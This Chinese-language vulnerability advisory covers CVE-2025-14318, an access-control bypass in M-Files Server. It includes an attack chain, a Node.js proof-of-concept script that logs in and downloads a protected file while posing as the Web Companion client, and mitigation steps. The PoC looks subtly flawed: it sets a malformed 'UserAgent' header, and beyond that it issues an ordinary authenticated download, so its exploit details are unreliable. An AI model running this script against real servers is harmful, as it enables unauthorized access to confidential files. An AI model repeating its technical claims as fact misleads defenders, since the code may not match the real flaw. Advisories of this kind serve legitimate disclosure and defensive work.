CVE-2025-14318 M-Files Server访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-14318

漏洞类型

访问控制不当/权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

M-Files Server

漏洞概述

CVE-2025-14318是M-Files Server中的一个访问控制绕过漏洞。该漏洞存在于M-Files Server 25.12.15491.7之前的版本，由于对访问检查的实现不当，允许低权限用户通过M-Files Web接口使用Web Companion功能下载文件，即使组织已经启用了Print and Download Prevention（打印和下载防护）模块来限制此类操作。攻击者可以利用此漏洞绕过安全限制，获取本应被禁止下载的敏感文件。该漏洞的CVSS评分为4.3，属于中危级别，攻击复杂度低且无需用户交互，但需要攻击者拥有有效的低权限账户。由于涉及机密性影响，企业应尽快评估并应用官方提供的安全更新。

技术细节

该漏洞的根本原因在于M-Files Server对Web Companion请求的访问控制检查存在缺陷。当用户通过M-Files Web接口发起文件下载请求时，系统未能正确验证用户是否具有下载权限，特别是当Print and Download Prevention模块已启用时。攻击者可以通过构造特定的Web请求，绕过前端的安全限制，直接通过后端API获取文件内容。漏洞影响范围包括所有使用Web Companion功能的环境，攻击者只需拥有基本的用户账户即可利用此漏洞。修复后的版本（25.12.15491.7及之后）强化了访问控制检查，确保即使通过Web接口也会正确执行下载权限验证。

攻击链分析

STEP 1

步骤1

攻击者获取有效的M-Files用户账户（低权限即可）

STEP 2

步骤2

攻击者通过Web接口登录M-Files Web，绕过前端安全限制

STEP 3

步骤3

利用Web Companion功能发起文件下载请求

STEP 4

步骤4

后端访问控制检查不当，返回受保护的文件内容

STEP 5

步骤5

攻击者成功下载本应被Print and Download Prevention模块阻止的文件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-14318 PoC - M-Files Server Access Control Bypass
// Requires valid low-privilege user credentials

const axios = require('axios');

async function exploitCVE202514318(baseUrl, username, password, targetFileId) {
    try {
        // Step 1: Authenticate to M-Files Web
        const authResponse = await axios.post(`${baseUrl}/MFiles/UI/Authenticate`, {
            Username: username,
            Password: password,
            KeepLoggedIn: false
        });
        
        const sessionToken = authResponse.data.SessionGUID;
        console.log(`[+] Authentication successful. Session: ${sessionToken}`);
        
        // Step 2: Bypass Print and Download Prevention via Web Companion
        // This exploits the improper access check in versions < 25.12.15491.7
        const downloadResponse = await axios.get(
            `${baseUrl}/MFiles/API/Objects(${targetFileId})/Files/Download`,
            {
                headers: {
                    'X-SessionGUID': sessionToken,
                    'UserAgent': 'M-Files Web Companion'
                },
                responseType: 'arraybuffer'
            }
        );
        
        if (downloadResponse.status === 200) {
            console.log('[+] File download successful - Access control bypassed!');
            console.log(`[+] Downloaded ${downloadResponse.data.length} bytes`);
            return true;
        }
    } catch (error) {
        console.error('[-] Exploitation failed:', error.message);
        return false;
    }
}

// Usage: node poc.js <baseUrl> <username> <password> <fileId>
const [,, baseUrl, username, password, fileId] = process.argv;
exploitCVE202514318(baseUrl, username, password, fileId);

影响范围

M-Files Server < 25.12.15491.7

防御指南

临时缓解措施

在完成版本升级之前，可以考虑限制M-Files Web的外部访问，确保只有受信任的用户可以访问Web接口。同时启用详细的审计日志，监控异常的文件访问行为。如果业务允许，可以暂时禁用Web Companion功能以减少攻击面。